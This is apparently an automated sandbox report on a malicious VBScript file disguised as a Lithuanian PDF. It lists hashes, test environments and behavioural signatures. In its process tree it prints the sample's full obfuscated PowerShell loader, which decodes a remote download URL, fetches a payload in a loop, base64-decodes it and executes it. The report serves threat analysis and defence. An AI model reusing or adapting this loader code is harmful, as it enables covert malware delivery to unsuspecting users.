Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 15:52
Static task
static1
Behavioral task
behavioral1
Sample
LSMU CITATA LT 20-11-2024·pdf.vbe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
LSMU CITATA LT 20-11-2024·pdf.vbe
Resource
win10v2004-20241007-en
General
-
Target
LSMU CITATA LT 20-11-2024·pdf.vbe
-
Size
11KB
-
MD5
df045c185b46e8c2432ea266b0671f86
-
SHA1
db27134d7be95240a1349bbcd1a1dcfa0dfb3506
-
SHA256
27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
-
SHA512
99306cbf23bf7a00a398849ca8ff25ce9ab1659f686e28e3e843b1a1632637495c177044173e70ad58571e2d856f4aa4e4b22b2e48e9a8cc3944feabeb4e11ae
-
SSDEEP
192:1P3nxwOrFEWWm60w5HPZMy35kCktIFc/T+zxLQkQUYUu59ynvT/1dut4VXcz1Xzy:9pJEWM08HRdyCHFsaFQkQUYhivZktOMc
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2472 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2348 wrote to memory of 2472 2348 WScript.exe powershell.exe PID 2348 wrote to memory of 2472 2348 WScript.exe powershell.exe PID 2348 wrote to memory of 2472 2348 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LSMU CITATA LT 20-11-2024·pdf.vbe"1⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-